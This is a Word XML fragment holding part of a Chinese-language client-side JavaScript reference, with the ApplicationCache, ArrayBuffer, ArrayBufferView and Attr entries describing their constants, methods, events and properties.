    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在本书之前的版本中，每个方法都有一个单独的参考条目，但在这一版中，</w:t>
      </w:r>
      <w:r>
        <w:t>方法描述直接包含在父条目中，因此组织上更为紧凑（未省略细节）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="199" w:after="199"/>
      </w:pPr>
      <w:bookmarkStart w:id="783" w:name="Ke_Hu_Duan_JavaScriptCan_Kao_"/>
      <w:r>
        <w:t>客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>参考</w:t>
      </w:r>
      <w:bookmarkEnd w:id="783"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="784" w:name="ApplicationCache"/>
      <w:r>
        <w:t>ApplicationCache</w:t>
      </w:r>
      <w:bookmarkEnd w:id="784"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>应用缓存管理</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>EventTarget</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ApplicationCache</w:t>
      </w:r>
      <w:r>
        <w:t>对象是</w:t>
      </w:r>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>applicationCache</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值，它定义一个</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，用于管理已缓存应用的更新。简单的缓</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>存应用可不必使用这个</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，如同</w:t>
      </w:r>
      <w:r>
        <w:t>20.4</w:t>
      </w:r>
      <w:r>
        <w:t>节描述的，创建（以及更新，如果有必要的话）一个合适的缓存清单就足够了。那些需要更主动地管理更新的复杂缓存应用可以使用下面列举的属性、方法以及事件处</w:t>
      </w:r>
      <w:r>
        <w:t>理程序。更多细节见</w:t>
      </w:r>
      <w:r>
        <w:t>20.4.2</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>常量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>status</w:t>
      </w:r>
      <w:r>
        <w:t>属性可以取以下值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short UNCACHED=0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前应用没有</w:t>
      </w:r>
      <w:r>
        <w:t>manifest</w:t>
      </w:r>
      <w:r>
        <w:t>属性：未缓存。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short IDLE=1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>清单已检查，当前应用已缓存并为最新。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short CHECKING=2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>浏览器正在检查清单文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short DOWNLOADING=3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>浏览器正在下载并缓存清单中的文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short UPDATEREADY=4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当前应用的一个新版本已下载并缓存。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short OBSOLETE=5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>清单已不存在，缓存将删除。</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short status</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性描述当前文档的缓存状态，它可以取上面列出的某个常数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void swapCache()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:t>status</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值为</w:t>
      </w:r>
      <w:r>
        <w:t>UPDATEREADY</w:t>
      </w:r>
      <w:r>
        <w:t>时，浏览器正维护当前应用的两个缓存版本：当前正在使用的文件来自老版本缓存，新版本的文件刚下载完成并将在应用下次重新加载时使用。可以调用</w:t>
      </w:r>
      <w:r>
        <w:t>swapCache()</w:t>
      </w:r>
      <w:r>
        <w:t>来让浏览器马上丢弃老缓存</w:t>
      </w:r>
      <w:r>
        <w:t>并使用新缓存中的文件。需要注意的是，这种方式可能导致版本偏差的问题，从老缓存切换为新缓存的较安全的方式是使用</w:t>
      </w:r>
      <w:r>
        <w:t>Location.reload()</w:t>
      </w:r>
      <w:r>
        <w:t>方法重新加载当前应用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>void update()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一般情况下，每次加载已缓存的应用时，浏览器都会检查该应用的清单文件是否有更新。页面长期不刷新的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用可以使用这个方法来更频繁地检查更新。</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在检查清单以及更新缓存的过程中，浏览器会在</w:t>
      </w:r>
      <w:r>
        <w:t>ApplicationCache</w:t>
      </w:r>
      <w:r>
        <w:t>上触发一个事件序列。可使用下面的</w:t>
      </w:r>
      <w:r>
        <w:t>ApplicationCache</w:t>
      </w:r>
      <w:r>
        <w:t>对象的事件处理程序属性来注册事件处理程序，或者使用</w:t>
      </w:r>
      <w:r>
        <w:t>ApplicationCache</w:t>
      </w:r>
      <w:r>
        <w:t>对象实现的</w:t>
      </w:r>
      <w:r>
        <w:t>EventTarget()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。这些事件的大多数处理程序都传入一个简单的</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象，但进度事件的处理程序例外，它传入一个</w:t>
      </w:r>
      <w:r>
        <w:t>ProgressEvent</w:t>
      </w:r>
      <w:r>
        <w:t>对象，此对象可用于跟踪当前已下载的字节数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>oncached</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在应用首次缓存时触发。这是事件序列中的最后一个事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onchecki</w:t>
      </w:r>
      <w:r>
        <w:t>ng</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当浏览器开始检查清单文件是否有更新时触发。在所有的应用缓存事件序列中，这都是第一个事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ondownloading</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当浏览器开始下载清单文件中列出的资源时触发，无论这是该应用首次缓存还是一次更新。这个事件后面通常会跟着一个或多个进度事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当缓存更新过程中出现错误时触发。比如，如果浏览器掉线，或者一个未缓存的应用引用一个不存在的清单文件时，就会触发这个事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onnoupdate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当浏览器认为清单没有变化并且缓存的应用就是当前应用时触发。这是事件序列的最后一个事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onobsolete</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当已缓存应用的清单文件不复存在时触发。这会引发缓存被删除。这是事件序列的最后一个事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onprogress</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当应用的文件正在被下载并缓存时周期性地触发。与这个事件关联的事件对象是一个</w:t>
      </w:r>
      <w:r>
        <w:t>ProgressEvent</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>onupdateready</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当应用的一个新版本下载完成并缓存（将在应用下次加载时使用）时触发。这是事件序列的最后一个事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="785" w:name="ArrayBuffer"/>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:bookmarkEnd w:id="785"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>固定长度的字节序列</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>表现为内存中的一个固定长度的序列，但它没有定义存取这些字节的方法。</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffe</w:t>
      </w:r>
      <w:r>
        <w:t>rViews</w:t>
      </w:r>
      <w:r>
        <w:t>类似于</w:t>
      </w:r>
      <w:r>
        <w:t>TypedArray</w:t>
      </w:r>
      <w:r>
        <w:t>类，提供了访问及解析这些字节的方法。</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ArrayBuffer(unsigned long length)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>新建一个指定字节数的</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>。新</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>中的所有字节都初始化为</w:t>
      </w:r>
      <w:r>
        <w:t>0</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byteLength</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>的长度，单位为字节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="786" w:name="ArrayBufferView"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ArrayBufferView</w:t>
      </w:r>
      <w:bookmarkEnd w:id="786"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>基于</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>的类型的通用属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ArrayBufferView</w:t>
      </w:r>
      <w:r>
        <w:t>是一个超类，提供用于访问</w:t>
      </w:r>
      <w:r>
        <w:t>Arr</w:t>
      </w:r>
      <w:r>
        <w:t>ayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>对象字节内容的类型。无法直接创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBufferView</w:t>
      </w:r>
      <w:r>
        <w:t>：它存在的意义是为了定义如</w:t>
      </w:r>
      <w:r>
        <w:t>TypedArray</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>DataView</w:t>
      </w:r>
      <w:r>
        <w:t>等子类型的通用属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly ArrayBuffer buffer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前对象的视图所包含的</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly unsigned long byteLength</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通过当前视图能访问到的缓存部分的长度，单位为字节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly unsigned long byteOffset</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通过当前视图能访问的缓存部分的开始位置，单位为</w:t>
      </w:r>
      <w:r>
        <w:t>字节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="787" w:name="Attr"/>
      <w:r>
        <w:t>Attr</w:t>
      </w:r>
      <w:bookmarkEnd w:id="787"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>元素的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Attr</w:t>
      </w:r>
      <w:r>
        <w:t>对象表示一个</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>节点的属性。可通过</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>接口的</w:t>
      </w:r>
      <w:r>
        <w:t>attributes</w:t>
      </w:r>
      <w:r>
        <w:t>属性取得</w:t>
      </w:r>
      <w:r>
        <w:t>Attr</w:t>
      </w:r>
      <w:r>
        <w:t>对象，或者调用</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>接口的</w:t>
      </w:r>
      <w:r>
        <w:t>getAttributeNode()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>getAttributeNodeNS()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由于属性值可以完全由字符串表示，因此通常不需要使用</w:t>
      </w:r>
      <w:r>
        <w:t>Attr</w:t>
      </w:r>
      <w:r>
        <w:t>接口。在多数情况下，使用属性最简单的方法是使用</w:t>
      </w:r>
      <w:r>
        <w:t>Element.getAttribute()</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>Element.setAttribute()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。这些方法使用字符串作为属性值，完全不需要用到</w:t>
      </w:r>
      <w:r>
        <w:t>Attr</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string localName</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性的名字，不包含任何命名空间前缀。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性的名字，包含命名空间前缀（如果存在的话）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string namespaceURI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>标识属性命名空间的</w:t>
      </w:r>
      <w:r>
        <w:t>URI</w:t>
      </w:r>
      <w:r>
        <w:t>，如果不存在的话为空（</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string prefx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性的命名空间前缀，如果不存在的话为空（</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
